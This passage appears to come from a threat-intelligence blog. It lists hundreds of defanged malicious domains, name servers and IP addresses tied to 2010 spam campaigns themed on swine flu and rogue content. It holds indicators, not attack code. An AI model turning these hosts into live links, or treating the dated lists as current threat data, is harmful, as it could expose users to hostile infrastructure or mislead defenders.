hxxp://ratemyblog1.com

hxxp://greatvideo3.com

hxxp://beginner2009.com

hxxp://fastwebway.com

hxxp://blazervips.com

hxxp://begin2009.com

hxxp://megatradetds0.com

hxxp://securedonlinewebspace.com

hxxp://proweb-info.com

hxxp://security-www-clicks.com

hxxp://updatedownloadlists.com

hxxp://styleonlyclicks.cn

hxxp://informationgohere.com

hxxp://world-click-service.com

hxxp://secutitypowerclicks.cn

hxxp://securedclickuser.cn/

hxxp://slickoverview.com

hxxp://viewyourclicks.com

hxxp://clickwww2.com

hxxp://clickadsystem.com

hxxp://becomepoweruser.cn

hxxp://clickoverridesystem.cn

Related malicious domains known to have participated in the campaign:

hxxp://protecteduser.cn
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hxxp://internetprotectedweb.com/

hxxp://clicksadssystems.com

hxxp://whereismyclick.cn

hxxp://trustourclicks.cn

hxxp://goldenstarclick.cn

hxxp://defendedsystemuser.cn

Related malicious domains known to have participated in the campaign:

hxxp://drivemedirect.com

hxxp://virtualblog5.com

hxxp://fastwebway.com

We’ll continue monitoring the campaign and post updates as soon as new developments take place.
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Historical OSINT - Spamvertized Swine Flu Domains - Part Two (2018-10-21 23:50)

It’s 2010 and I’ve recently came across to a currently active diverse portfolio of Swine Flu related domains further

enticing users into interacting with rogue and malicious content.

In this post I’ll profile and expose a currently active malicious domains portfolio currently circulating in the

wild successfully involved in an ongoing variety of Swine Flu malicious spam campaigns and will provide actionable

intelligence on the infrastructure behind it.

Related malicious domains known to have participated in the campaign:

hxxp://pehwitew.cn - 58.17.3.44; 58.20.140.5; 220.248.167.126; 60.191.221.116; 110.52.6.252

Related name servers known to have participated in the campaign:

hxxp://ns6.plusspice.com - 110.52.6.252

hxxp://ns2.morewhole.com

hxxp://ns2.extolshare.com

hxxp://ns2.pridesure.com

hxxp://ns2.swellwise.com

hxxp://ns4.boostwise.com

hxxp://ns6.maxitrue.com

hxxp://ns4.sharezeal.com

hxxp://ns2.extolcalm.com

hxxp://ns4.humortan.com

hxxp://ns2.joysheer.com

hxxp://ns2.zestleads.com

hxxp://ns4.fizzleads.com

hxxp://ns4.maxigreat.com

hxxp://ns4.spicyrest.com

hxxp://ns4.hardyzest.com

hxxp://ns2.resttrust.com

hxxp://ns2.alertwow.com

hxxp://ns2.savetangy.com

hxxp://ns4.lovetangy.com

hxxp://ns2.coyrosy.com

Related malicious domains known to have participated in the campaign:

hxxp://jihpuyab.cn

hxxp://dabwedib.cn

hxxp://jehrawob.cn

hxxp://lacgidub.cn

hxxp://fektiyub.cn

hxxp://qucmolac.cn

hxxp://xopfekec.cn

hxxp://gamfesec.cn

hxxp://xokdemic.cn

hxxp://papxunic.cn

hxxp://jiqlosic.cn

hxxp://liynaloc.cn

hxxp://womrifuc.cn

hxxp://picduluc.cn
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hxxp://feqtawuc.cn

hxxp://becfuzuc.cn

hxxp://ximnusad.cn

hxxp://limyoxed.cn

hxxp://cokgozed.cn

hxxp://qursehod.cn

hxxp://pimfilod.cn

hxxp://zofxitod.cn

hxxp://pehdiwod.cn

hxxp://ruvvabud.cn

hxxp://japwolud.cn

hxxp://qolqaqaf.cn

hxxp://tacreyaf.cn

hxxp://rajvufef.cn

hxxp://hiwjadif.cn

hxxp://pejjenif.cn

hxxp://hakyabof.cn

hxxp://rijgihag.cn

hxxp://pipgaqag.cn

hxxp://jaxkewag.cn

hxxp://cikqumog.cn

hxxp://tircodug.cn

hxxp://juryaqug.cn

hxxp://yawfadah.cn

hxxp://yabtudah.cn

hxxp://qifhihah.cn

hxxp://xeyselah.cn

hxxp://cotmetah.cn

hxxp://bulmitah.cn

hxxp://tegbejih.cn

hxxp://tuymokih.cn

hxxp://modqopoh.cn

hxxp://qejpoduh.cn

hxxp://xajsomuh.cn

hxxp://wisziruh.cn

hxxp://maypajej.cn

hxxp://tivhikej.cn

hxxp://holmayej.cn

hxxp://dabtizej.cn

hxxp://koyxuwij.cn

hxxp://romxebuj.cn

hxxp://hilzuluj.cn

hxxp://zulfavuj.cn

hxxp://vojhowuj.cn

hxxp://daldukak.cn

hxxp://rakvirak.cn

hxxp://fimresak.cn

hxxp://zepyosak.cn

hxxp://tovpiwak.cn

hxxp://raqhizak.cn
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hxxp://salhibik.cn

hxxp://xonzulik.cn

hxxp://jezwutik.cn

hxxp://lungodok.cn

hxxp://qeytakok.cn

hxxp://weswukuk.cn

hxxp://lawmamuk.cn

hxxp://xomhoruk.cn

hxxp://zitkowuk.cn

hxxp://hoyzexuk.cn

hxxp://cutholal.cn

hxxp://jidtecel.cn

hxxp://jovmuhil.cn

hxxp://guxdipil.cn

hxxp://kujkuwil.cn

hxxp://kojvifol.cn

hxxp://zitgohol.cn

hxxp://cosxotol.cn

hxxp://wahwoxol.cn

hxxp://siqsayol.cn

hxxp://pipwoqul.cn

hxxp://zilfumam.cn

hxxp://fokvidem.cn

hxxp://vamhefem.cn

hxxp://hipxetem.cn

hxxp://hasrozem.cn

hxxp://yovbafim.cn

hxxp://zutgaqim.cn

hxxp://kamnorim.cn

hxxp://nussotim.cn

hxxp://yiblegom.cn

hxxp://vorteyom.cn

hxxp://mokgupum.cn

hxxp://xennesum.cn

hxxp://feshivum.cn

hxxp://nakcaban.cn

hxxp://yaxxokan.cn

hxxp://qikciqan.cn

hxxp://gagsuran.cn

hxxp://bopxuran.cn

hxxp://giwduvan.cn

hxxp://gixreqin.cn

hxxp://leccatin.cn

hxxp://jollipon.cn

hxxp://vuzlopon.cn

hxxp://butkoxon.cn

hxxp://falyewun.cn

hxxp://noscajap.cn

hxxp://xirqocep.cn

hxxp://daqdohep.cn
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hxxp://wokvarep.cn

hxxp://hoggudip.cn

hxxp://heqfavip.cn

hxxp://jowrewip.cn

hxxp://cimqiqop.cn

hxxp://cibqobup.cn

hxxp://zijreyup.cn

hxxp://tosnabaq.cn

hxxp://tochekaq.cn

hxxp://cosmoqaq.cn

hxxp://zavnusaq.cn

hxxp://vufsaqeq.cn

hxxp://dagligiq.cn

hxxp://wugjaziq.cn

hxxp://fepsuwoq.cn

hxxp://pombeyoq.cn

hxxp://dokcokuq.cn

hxxp://diwsutuq.cn

hxxp://sayjumar.cn

hxxp://jidxurer.cn

hxxp://qalhiyir.cn

hxxp://goqtoqor.cn

hxxp://gaxdavor.cn

hxxp://kazqikas.cn

hxxp://piskeces.cn

hxxp://qamhadis.cn

hxxp://wifdixis.cn

hxxp://hejhelos.cn

hxxp://hedwimos.cn

hxxp://kerrucus.cn

hxxp://forhalus.cn

hxxp://fesnupus.cn

hxxp://lanzuhat.cn

hxxp://kadmepat.cn

hxxp://potzoyat.cn

hxxp://jupkevet.cn

hxxp://xagmiqit.cn

hxxp://woxjatit.cn

hxxp://gukpuxit.cn

hxxp://dubpacut.cn

hxxp://nifbihut.cn

hxxp://qunkofav.cn

hxxp://vippogav.cn

hxxp://rimjulav.cn

hxxp://kemhenav.cn

hxxp://gutziqav.cn

hxxp://gipbilev.cn

hxxp://kaxcidiv.cn

hxxp://xajwawov.cn

hxxp://rejcoyov.cn
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hxxp://jogsuduv.cn

hxxp://lamfoguv.cn

hxxp://daxtohuv.cn

hxxp://mihwuxuv.cn

hxxp://hiwjuhaw.cn

hxxp://gohkijaw.cn

hxxp://tuwqetaw.cn

hxxp://lacjebew.cn

hxxp://vodrubew.cn

hxxp://pehwitew.cn

hxxp://yezxewew.cn

hxxp://yuvsobow.cn

hxxp://yodmapow.cn

hxxp://qotpobuw.cn

hxxp://megrafuw.cn

hxxp://zamponuw.cn

hxxp://kotzequw.cn

hxxp://yudmaruw.cn

hxxp://hamqiruw.cn

hxxp://siwwawuw.cn

hxxp://veqniwuw.cn

hxxp://bepnudax.cn

hxxp://jehfefax.cn

hxxp://boxjokex.cn

hxxp://yoclerex.cn

hxxp://guzjacix.cn

hxxp://mexcekix.cn

hxxp://kibtixix.cn

hxxp://conyixix.cn

hxxp://famlojox.cn

hxxp://jizwalox.cn

hxxp://dahhowox.cn

hxxp://zicquvtx.cn

hxxp://cavxujux.cn

hxxp://voqnolux.cn

Known to have responded to the same malicious IP (60.191.221.123) are also the following malicious do-

mains:

hxxp://vitsulob.cn

hxxp://jahnivub.cn

hxxp://wipviyub.cn

hxxp://gokbulac.cn

hxxp://bedqaqac.cn

hxxp://suvnuqac.cn

hxxp://wukcilec.cn

hxxp://lukbolec.cn

hxxp://juhfaqic.cn

hxxp://mixwiqic.cn

hxxp://qikloric.cn

hxxp://halgiyic.cn
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hxxp://jocvoloc.cn

hxxp://gugmikad.cn

hxxp://zoqvulad.cn

hxxp://zokdoled.cn

hxxp://daxlated.cn

hxxp://cahnubid.cn

hxxp://cufxuhod.cn

hxxp://libsorod.cn

hxxp://vopqatod.cn

hxxp://cebvoyod.cn

hxxp://lansocud.cn

hxxp://zohpakud.cn

hxxp://hekwasud.cn

hxxp://niknuvud.cn

hxxp://meymuhaf.cn

hxxp://nigkojef.cn

hxxp://bazmoyef.cn

hxxp://roszadif.cn

hxxp://sapmofif.cn

hxxp://kudxodof.cn

hxxp://pefkipof.cn

hxxp://xoqresof.cn

hxxp://fipxevof.cn

hxxp://quyzeluf.cn

hxxp://xujyeruf.cn

hxxp://xenpikeg.cn

hxxp://tafwohig.cn

hxxp://kowtuhig.cn

hxxp://dinpisig.cn

hxxp://teryuvig.cn

hxxp://funcizig.cn

hxxp://ciytamog.cn

hxxp://jemsowog.cn

hxxp://kiqzijug.cn

hxxp://pulfaxug.cn

hxxp://wojlabah.cn

hxxp://belzejah.cn

hxxp://pefdovah.cn

hxxp://xijsameh.cn

hxxp://racridih.cn

hxxp://rewfahih.cn

hxxp://vihxujih.cn

hxxp://qujvosih.cn

hxxp://figqacuh.cn

hxxp://xohmoluh.cn

hxxp://jicniwuh.cn

hxxp://kapxuraj.cn

hxxp://jubjavaj.cn

hxxp://bidkuqej.cn

hxxp://jarvixej.cn
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hxxp://qinzidij.cn

hxxp://zagzafij.cn

hxxp://merjuwij.cn

hxxp://weqbujuj.cn

hxxp://gucdaluj.cn

hxxp://modxowuj.cn

hxxp://tobponak.cn

hxxp://tacjujek.cn

hxxp://fumliqek.cn

hxxp://wavfebik.cn

hxxp://xizqibik.cn

hxxp://focnigik.cn

hxxp://biqmipik.cn

hxxp://zowcoqik.cn

hxxp://fexsitik.cn

hxxp://qebdevik.cn

hxxp://xolkisok.cn

hxxp://kuqwuwok.cn

hxxp://gunwonuk.cn

hxxp://hewquvuk.cn

hxxp://gunbaqal.cn

hxxp://seysixal.cn

hxxp://zaymamel.cn

hxxp://weznohil.cn

hxxp://keczakil.cn

hxxp://wawberol.cn

hxxp://naftemul.cn

hxxp://sedbonam.cn

hxxp://velwapam.cn

hxxp://zinzutam.cn

hxxp://nudgixam.cn

hxxp://mibpabem.cn

hxxp://yolbaqem.cn

hxxp://fogduqem.cn

hxxp://qawtotem.cn

hxxp://qalfusim.cn

hxxp://kocguwim.cn

hxxp://zishikom.cn

hxxp://kozpipom.cn

hxxp://loblahum.cn

hxxp://winbomum.cn

hxxp://jakmezum.cn

hxxp://taglolan.cn

hxxp://suznuwan.cn

hxxp://jekwazan.cn

hxxp://toxmijen.cn

hxxp://nikguzen.cn

hxxp://dedmewin.cn

hxxp://jebvuwun.cn

hxxp://tupsikap.cn
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hxxp://dudsuzap.cn

hxxp://yessafep.cn

hxxp://danxenep.cn

hxxp://leklidip.cn

hxxp://duklimip.cn

hxxp://yevnurip.cn

hxxp://virrotip.cn

hxxp://lalyezop.cn

hxxp://jaztecup.cn

hxxp://gokbehup.cn

hxxp://cuqyirup.cn

hxxp://gajvizup.cn

hxxp://cahwikaq.cn

hxxp://xeqbelaq.cn

hxxp://xicbamaq.cn

hxxp://qofqoneq.cn

hxxp://givxuyeq.cn

hxxp://gonganiq.cn

hxxp://vijsoziq.cn

hxxp://bignijoq.cn

hxxp://jejroxoq.cn

hxxp://culfunuq.cn

hxxp://qevxayuq.cn

hxxp://merwosar.cn

hxxp://loxvafer.cn

hxxp://cawnamir.cn

hxxp://wocyorir.cn

hxxp://tokhador.cn

hxxp://yuznisor.cn

hxxp://vamtator.cn

hxxp://gojligur.cn

hxxp://vukqejur.cn

hxxp://fewxopur.cn

hxxp://wukwoxur.cn

hxxp://bavyoxur.cn

hxxp://jegdufas.cn

hxxp://rillefes.cn

hxxp://niwwages.cn

hxxp://comrames.cn

hxxp://rohfapes.cn

hxxp://lehredis.cn

hxxp://jepniwos.cn

hxxp://lexxedus.cn

hxxp://xuljuhus.cn

hxxp://levgepat.cn

hxxp://modhewet.cn

hxxp://kawlozet.cn

hxxp://bufsofit.cn

hxxp://gekloyit.cn

hxxp://tercifot.cn
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hxxp://yughaqut.cn

hxxp://surfabav.cn

hxxp://yutbevav.cn

hxxp://mowvahev.cn

hxxp://tuwcexev.cn

hxxp://liqfimiv.cn

hxxp://pefxamuv.cn

hxxp://goqdexuv.cn

hxxp://fozlubaw.cn

hxxp://yuxcizaw.cn

hxxp://mevvubew.cn

hxxp://nuzzuhew.cn

hxxp://dibkicow.cn

hxxp://lobrakow.cn

hxxp://vuksirow.cn

hxxp://samnuvow.cn

hxxp://jizlotuw.cn

hxxp://buzgikax.cn

hxxp://jawcesax.cn

hxxp://qatvegex.cn

hxxp://gegfejex.cn

hxxp://cigxekex.cn

hxxp://kejjobox.cn

hxxp://yosbucox.cn

hxxp://kelmogox.cn

hxxp://jeqyuzox.cn

hxxp://jocxebux.cn

hxxp://tawcizux.cn

hxxp://kittokay.cn

hxxp://seryusay.cn

hxxp://nocbusey.cn

hxxp://semfihiy.cn

hxxp://xotgajiy.cn

hxxp://sarvujiy.cn

hxxp://gicmosiy.cn

hxxp://fulpaziy.cn

hxxp://cunzumoy.cn

Related malicious name servers known to have participated in the campaign:

hxxp://ns2.boostaroma.com - 110.52.6.252

hxxp://ns2.okultra.com

hxxp://ns2.swellfab.com

hxxp://ns2.shehead.com

hxxp://ns2.atbread.com

hxxp://ns2.treatglad.com

hxxp://ns2.plumbold.com

hxxp://ns2.callold.com

hxxp://up2.thicksend.com

hxxp://ns6.zestkind.com

hxxp://ns2.burnround.com
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hxxp://ns2.witproud.com

hxxp://ns2.fizznice.com

hxxp://ns6.plusspice.com

hxxp://up2.humaneagree.com

hxxp://ns2.adorewee.com

hxxp://ns4.kindable.com

hxxp://ns2.prideable.com

hxxp://ns2.cuddlyhumble.com

hxxp://ns2.ablewhole.com

hxxp://ns2.quickwhole.com

hxxp://ns2.plumpwhole.com

hxxp://up2.begancome.com

hxxp://up2.sizeplane.com

hxxp://up2.colonytype.com

hxxp://ns6.prizeaware.com

hxxp://ns2.pridesure.com

hxxp://ns2.toophrase.com

hxxp://ns2.loyalrise.com

hxxp://up2.pathuse.com

hxxp://ns2.dimplechaste.com

hxxp://ns2.welltrue.com

hxxp://ns2.ziptrue.com

hxxp://ns2.silverwe.com

hxxp://ns2.calmprize.com

hxxp://ns2.firmrich.com

hxxp://ns2.activeinch.com

hxxp://ns2.cookmulti.com

hxxp://ns2.wellmoral.com

hxxp://ns2.peakswell.com

hxxp://ns2.posewill.com

hxxp://ns2.droolcool.com

hxxp://up2.cuddlypoem.com

hxxp://ns2.loyalcalm.com

hxxp://ns2.extolcalm.com

hxxp://ns2.radiothan.com

hxxp://up2.persontrain.com

hxxp://ns2.awardfun.com

hxxp://ns4.zealreap.com

hxxp://ns2.piousreap.com

hxxp://ns2.firstreap.com

hxxp://ns2.grandzap.com

hxxp://ns2.royalzap.com

hxxp://ns6.ablezip.com

hxxp://ns2.zapeager.com

hxxp://up2.blockfather.com

hxxp://ns2.breezycorner.com

hxxp://ns2.donewater.com

hxxp://ns2.listenflower.com

hxxp://ns2.dimplechair.com

hxxp://up2.yardcolor.com
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hxxp://ns4.fizzleads.com

hxxp://up2.finestgrass.com

hxxp://ns2.prizebeats.com

hxxp://ns4.maxigreat.com

hxxp://ns2.flairtreat.com

hxxp://up2.tingleflat.com

hxxp://ns6.proudquiet.com

hxxp://ns2.morequiet.com

hxxp://ns2.droolplanet.com

hxxp://up2.giftedunit.com

hxxp://ns2.solarwit.com

hxxp://ns2.ropemeant.com

hxxp://ns2.paradiseobedient.com

hxxp://ns4.paradiseobedient.com

hxxp://up2.minealert.com

hxxp://ns4.spicyrest.com

hxxp://ns4.alertjust.com

hxxp://ns2.resttrust.com

hxxp://ns2.pagefew.com

hxxp://ns2.multiaglow.com

hxxp://ns2.objectallow.com

hxxp://ns2.alertwow.com

hxxp://ns2.alivejuicy.com

hxxp://ns2.restjuicy.com

hxxp://ns2.funcomfy.com

hxxp://ns2.solarcomfy.com

hxxp://ns2.prizetangy.com

hxxp://ns2.wholehappy.com

hxxp://ns2.prideeasy.com

hxxp://ns2.suddeneasy.com

hxxp://ns2.treatrosy.com

hxxp://ns2.earlytwenty.com

Related malicious domains known to have participated in the campaign:

hxxp://xiskizop.cn

-

58.17.3.44;

60.191.239.189;

203.93.208.86

-

hxxp://ns5.prizeaware.com;

hxxp://ns1.grandzap.com; hxxp://ns3.alertjust.com

Related malicious domains known to have participated in the campaigns:

hxxp://xancefab.cn

hxxp://busgihab.cn

hxxp://putcojab.cn

hxxp://nizvonab.cn

hxxp://bulpapab.cn

hxxp://laztoqab.cn

hxxp://varsesab.cn

hxxp://pahdeheb.cn

hxxp://wiqponeb.cn

hxxp://rutfuseb.cn

hxxp://zacniyeb.cn

hxxp://beblelib.cn

92

hxxp://gahvosib.cn

hxxp://rigzowib.cn

hxxp://bacnaxib.cn

hxxp://pexyufob.cn

hxxp://sowgugob.cn

hxxp://buhbulob.cn

hxxp://ciybufub.cn

hxxp://xoddimub.cn

hxxp://nugtaqub.cn

hxxp://buvkuzub.cn

hxxp://fikqebac.cn

hxxp://pevremac.cn

hxxp://qokbasac.cn

hxxp://patmebec.cn

hxxp://kuntigec.cn

hxxp://jolcekec.cn

hxxp://wihjorec.cn

hxxp://fixruyec.cn

hxxp://gospozec.cn

hxxp://batrijic.cn

hxxp://rebzomic.cn

hxxp://loqrupic.cn

hxxp://diqhaqic.cn

hxxp://bohkoqic.cn

hxxp://beszesic.cn

hxxp://tuzhovic.cn

hxxp://hesyuvic.cn

hxxp://kovhewic.cn

hxxp://lufreyic.cn

hxxp://noxrazic.cn

hxxp://lefviboc.cn

hxxp://fodcuboc.cn

hxxp://pevhihoc.cn

hxxp://widlajoc.cn

hxxp://zocwoloc.cn

hxxp://janpupoc.cn

hxxp://mefbuqoc.cn

hxxp://hujqezoc.cn

hxxp://capjebuc.cn

hxxp://befqacuc.cn

hxxp://socjujuc.cn

hxxp://qivbiruc.cn

hxxp://tuxbaxuc.cn

hxxp://tidsuyuc.cn

hxxp://kapdacad.cn

hxxp://lagfagad.cn

hxxp://japtugad.cn

hxxp://bechumad.cn

hxxp://holceqad.cn

hxxp://bectusad.cn
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hxxp://tabzuwad.cn

hxxp://rednezad.cn

hxxp://megzizad.cn

hxxp://forvafed.cn

hxxp://hojliged.cn

hxxp://fuxcexed.cn

hxxp://baxpuxed.cn

hxxp://lugjized.cn

hxxp://lewdozed.cn

hxxp://hiszedid.cn

hxxp://buyquhid.cn

hxxp://wovyokid.cn

hxxp://yojvimid.cn

hxxp://widxixid.cn

hxxp://yovxoxid.cn

hxxp://reywufod.cn

hxxp://hubzahod.cn

hxxp://qapzekod.cn

hxxp://falxalod.cn

hxxp://yiznunod.cn

hxxp://towqotod.cn

hxxp://loxlayod.cn

hxxp://rockozod.cn

hxxp://johmabud.cn

hxxp://muvyucud.cn

hxxp://vattehud.cn

hxxp://fuytejud.cn

hxxp://kenyilud.cn

hxxp://cibsarud.cn

hxxp://najsatud.cn

hxxp://xibwazud.cn

hxxp://laztafaf.cn

hxxp://piynosaf.cn

hxxp://yelpidef.cn

hxxp://yagtudef.cn

hxxp://levxifef.cn

hxxp://povxajef.cn

hxxp://hetbetef.cn

hxxp://hudvotef.cn

hxxp://hemfowef.cn

hxxp://coqvazef.cn

hxxp://yawhojif.cn

hxxp://muvcewif.cn

hxxp://xadgobof.cn

hxxp://baxwuhof.cn

hxxp://wijtekof.cn

hxxp://sknqikof.cn

hxxp://mussiqof.cn

hxxp://gegwasof.cn

hxxp://xangesof.cn
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hxxp://wumdewof.cn

hxxp://hoqtayof.cn

hxxp://kiyvayof.cn

hxxp://cufdicuf.cn

hxxp://gotbucuf.cn

hxxp://gexzehuf.cn

hxxp://cepceluf.cn

hxxp://gepleluf.cn

hxxp://tefhosuf.cn

hxxp://xaqqivuf.cn

hxxp://wubfezuf.cn

hxxp://panrozuf.cn

hxxp://nadvofag.cn

hxxp://yawjehag.cn

hxxp://zeltimag.cn

hxxp://misgaqag.cn

hxxp://noxyaxag.cn

hxxp://sunluxag.cn

hxxp://bozhoceg.cn

hxxp://dawqefeg.cn

hxxp://locfemeg.cn

hxxp://mivlaneg.cn

hxxp://vaqxiseg.cn

hxxp://gesyateg.cn

hxxp://kumweteg.cn

hxxp://jefpaveg.cn

hxxp://lilyegig.cn

hxxp://janweqig.cn

hxxp://diwjusig.cn

hxxp://sohmiwig.cn

hxxp://rimmazig.cn

hxxp://tirpedog.cn

hxxp://jamguhog.cn

hxxp://bejfakog.cn

hxxp://bebyolog.cn

hxxp://kixmamog.cn

hxxp://tofyeqog.cn

hxxp://kojxuqog.cn

hxxp://puqtabug.cn

hxxp://suszibug.cn

hxxp://ciwracug.cn

hxxp://nahbugug.cn

hxxp://gaygokug.cn

hxxp://seygoqug.cn

hxxp://helqasug.cn

hxxp://tockesug.cn

hxxp://jipqevug.cn

hxxp://rewnowug.cn

hxxp://nazxefah.cn

hxxp://hofkagah.cn
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hxxp://coszegah.cn

hxxp://vojyojah.cn

hxxp://nihwalah.cn

hxxp://yojzatah.cn

hxxp://buvsutah.cn

hxxp://hulgadeh.cn

hxxp://nibzofeh.cn

hxxp://xickeqeh.cn

hxxp://kapmereh.cn

hxxp://regyaveh.cn

hxxp://lizpazeh.cn

hxxp://lujpobih.cn

hxxp://xozyecih.cn

hxxp://telhetih.cn

hxxp://dussadoh.cn

hxxp://lerbenoh.cn

hxxp://yokveqoh.cn

hxxp://hafgoqoh.cn

hxxp://gagkiroh.cn

hxxp://teftebuh.cn

hxxp://fitsofuh.cn

hxxp://ziwvomuh.cn

hxxp://fazlenuh.cn

hxxp://gazkinuh.cn

hxxp://dutmivuh.cn

hxxp://zukdayuh.cn

hxxp://busgayuh.cn

hxxp://nohpobaj.cn

hxxp://qusdumaj.cn

hxxp://wizdaqaj.cn

hxxp://wuwbeqaj.cn

hxxp://girzidej.cn

hxxp://vespifej.cn

hxxp://ceszegej.cn

hxxp://juqbumej.cn

hxxp://xuxmanej.cn

Related malicious name servers known to have participated in the campaign:

hxxp://ns1.quvzipda.com - 193.165.209.3

hxxp://ns1.syquskezaja.com

hxxp://ns1.mnysiwugpa.com

hxxp://ns1.uzfayxlob.com

hxxp://ns1.umkeihfub.com

hxxp://ns1.diethealthworld.com

hxxp://ns2.diethealthworld.com

hxxp://ns1.pillshopstore.com

hxxp://ns2.pillshopstore.com

hxxp://ns1.ixcopvudeg.com

hxxp://ns1.cuzatpih.com

hxxp://ns1.fondukoiwi.com
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hxxp://ns1.zevmyxhyhl.com

hxxp://ns1.pecsletoil.com

hxxp://ns1.havputviwl.com

hxxp://ns1.icuhzapyl.com

hxxp://ns1.ollectimon.com

hxxp://ns1.calpuwhup.com

hxxp://ns1.miacohder.com

hxxp://ns1.rjycbaswes.com

hxxp://ns1.tlyldihkis.com

hxxp://ns2.bestfreepills.com

hxxp://ns2.storehealthpills.com

hxxp://ns1.medspillsdiscounts.com

hxxp://ns1.ribormolu.com

hxxp://ns1.sluxjagvyw.com

hxxp://ns1.marttabletsrx.com

hxxp://ns1.zirremeaby.com

hxxp://ns1.xioduvvejy.com

hxxp://ns1.tmypheatvy.com

hxxp://ns1.zurmeigguz.com

hxxp://ns1.pendyxconvam.net

hxxp://ns1.mevkybmomu.net

hxxp://ns1.wutvymnu.net

hxxp://ns1.atquackephix.net

hxxp://ns1.gneqwyapuz.net

hxxp://ns1.az6.ru

hxxp://ns1.compmegastore.ru

hxxp://ns1.wearcompstore.ru

hxxp://ns1.compnetstore.ru

hxxp://ns1.seaportative.ru

hxxp://ns1.webshopmag.ru

hxxp://ns2.webshopmag.ru

hxxp://ns1.markettradersmag.ru

hxxp://ns1.storeonlinecomp.ru

hxxp://ns1.livingmagcomp.ru

hxxp://ns1.magcompdirect.ru

hxxp://ns1.storemycompdirect.ru

Related malicious domains known to have participated in the campaigns:

hxxp://hyuljavmyca.com - 212.174.200.111

hxxp://rjiofnida.com

hxxp://lubetokbufa.com

hxxp://homhylvega.com

hxxp://syquskezaja.com

hxxp://kriwmikib.com

hxxp://rhuwcugniob.com

hxxp://fonrasetlid.com

hxxp://rycnyrfikre.com

hxxp://tonlijwe.com

hxxp://mefcyqwef.com

hxxp://lorcowurayf.com
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hxxp://ubeuhroqug.com

hxxp://fadjybzih.com

hxxp://ghaknikfehi.com

hxxp://ksoknadsi.com

hxxp://fondukoiwi.com

hxxp://reixvyklick.com

hxxp://qworjulnenk.com

hxxp://svozquzrel.com

hxxp://pecsletoil.com

hxxp://havputviwl.com

hxxp://pendyxconvam.com

hxxp://whapzintaon.com

hxxp://ollectimon.com

hxxp://japyebawn.com

hxxp://xovtemfajo.com

hxxp://shymumoufjo.com

hxxp://calpuwhup.com

hxxp://iescehqucr.com

hxxp://thepillcorner.com

hxxp://kvirincyofr.com

hxxp://iecoqwecs.com

hxxp://syquskezaja.com - 200.204.57.187

hxxp://cuzatpih.com

hxxp://ollectimon.com

hxxp://sluxjagvyw.com

hxxp://xioduvvejy.com

hxxp://nravsaelvi.net

hxxp://pendyxconvam.net

hxxp://mevkybmomu.net

hxxp://atquackephix.net

hxxp://gneqwyapuz.net

Related malicious domains known to have participated in the campaign:

hxxp://tovpuveb.cn

hxxp://risregib.cn

hxxp://sapwopub.cn

hxxp://kutwuzub.cn

hxxp://dijmigac.cn

hxxp://davzunic.cn

hxxp://cuwlicoc.cn

hxxp://hinkizad.cn

hxxp://tiwkicid.cn

hxxp://giddehid.cn

hxxp://qehmujid.cn

hxxp://jadyoxid.cn

hxxp://yipxakud.cn

hxxp://qophepud.cn

hxxp://nawfusud.cn

hxxp://xohpebaf.cn
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hxxp://yilqobaf.cn

hxxp://gelkinef.cn

hxxp://zigconef.cn

hxxp://vasgotef.cn

hxxp://gitmufif.cn

hxxp://pujxatof.cn

hxxp://tagcafuf.cn

hxxp://joywehuf.cn

hxxp://xoggunuf.cn

hxxp://pezpipuf.cn

hxxp://gugfequf.cn

hxxp://kattowuf.cn

hxxp://rosmicag.cn

hxxp://nagnuteg.cn

hxxp://fohjedig.cn

hxxp://hijderig.cn

hxxp://dittomog.cn

hxxp://zubwefah.cn

hxxp://fodpohah.cn

hxxp://sehviwah.cn

hxxp://hifkuneh.cn

hxxp://bidfecih.cn

hxxp://wuxmulih.cn

hxxp://beqwacoh.cn

hxxp://qukvimoh.cn

hxxp://vasxavoh.cn

hxxp://salxaxoh.cn

hxxp://labyocaj.cn

hxxp://zigxadij.cn

hxxp://hixkanij.cn

hxxp://zixkitoj.cn

hxxp://zijzoguj.cn

hxxp://yiwzuluj.cn

hxxp://survuruj.cn

hxxp://feftuqak.cn

hxxp://ziscawak.cn

hxxp://wacpowek.cn

hxxp://segjinuk.cn

hxxp://viqfizuk.cn

hxxp://qawgegal.cn

hxxp://loqfogal.cn

hxxp://sihwohal.cn

hxxp://babtakal.cn

hxxp://nagnemel.cn

hxxp://ribwegil.cn

hxxp://watpiyil.cn

hxxp://goxmabul.cn

hxxp://siwkecul.cn

hxxp://selzimul.cn

hxxp://qakwivul.cn
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hxxp://bedvuyul.cn

hxxp://fiddozul.cn

hxxp://joldokim.cn

hxxp://foztokim.cn

hxxp://woklahum.cn

hxxp://gavsanum.cn

hxxp://kejrupum.cn

hxxp://hagjatum.cn

hxxp://xumfuzum.cn

hxxp://mafcocan.cn

hxxp://geqkedan.cn

hxxp://fumhasan.cn

hxxp://zosqinen.cn

hxxp://nonzinen.cn

hxxp://tahyedin.cn

hxxp://niyyurin.cn

hxxp://wokmison.cn

hxxp://nekmerun.cn

hxxp://gebzevun.cn

hxxp://dizxohap.cn

hxxp://wirzovap.cn

hxxp://cobyizip.cn

hxxp://sokwimop.cn

hxxp://digjipop.cn

hxxp://qagtohup.cn

hxxp://wodkepaq.cn

hxxp://kuqqavaq.cn

hxxp://vogyafeq.cn

hxxp://qokyaziq.cn

hxxp://gelmaloq.cn

hxxp://rikxeduq.cn

hxxp://mifzoyuq.cn

hxxp://jitmekar.cn

hxxp://zedbeper.cn

hxxp://qoyrifir.cn

hxxp://rerbogir.cn

hxxp://nexyutir.cn

hxxp://yuvwobor.cn

hxxp://raddijor.cn

hxxp://rehciror.cn

hxxp://jowqasor.cn

hxxp://wotrisor.cn

hxxp://tinselur.cn

hxxp://sacvakes.cn

hxxp://xonlefis.cn

hxxp://sehwukos.cn

hxxp://torxupos.cn

hxxp://yujzidus.cn

hxxp://dejzezat.cn

hxxp://gunjivet.cn
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hxxp://hecfocav.cn

hxxp://yuxdiqav.cn

hxxp://guysogiv.cn

hxxp://tebziniv.cn

hxxp://dedsupov.cn

hxxp://genwsxov.cn

hxxp://xaycozuv.cn

hxxp://fojgoraw.cn

hxxp://suwsozaw.cn

hxxp://hudwuhew.cn

hxxp://momzuhew.cn

hxxp://pibwokiw.cn

hxxp://lacfimiw.cn

hxxp://jubduriw.cn

hxxp://talcuviw.cn

hxxp://xavgubow.cn

hxxp://zovcofow.cn

hxxp://qopzubax.cn

hxxp://dogqodax.cn

hxxp://jimjakax.cn

hxxp://ricnafex.cn

hxxp://nadlewex.cn

hxxp://mokcegox.cn

hxxp://getkixox.cn

hxxp://wucpulux.cn

hxxp://dalpobay.cn

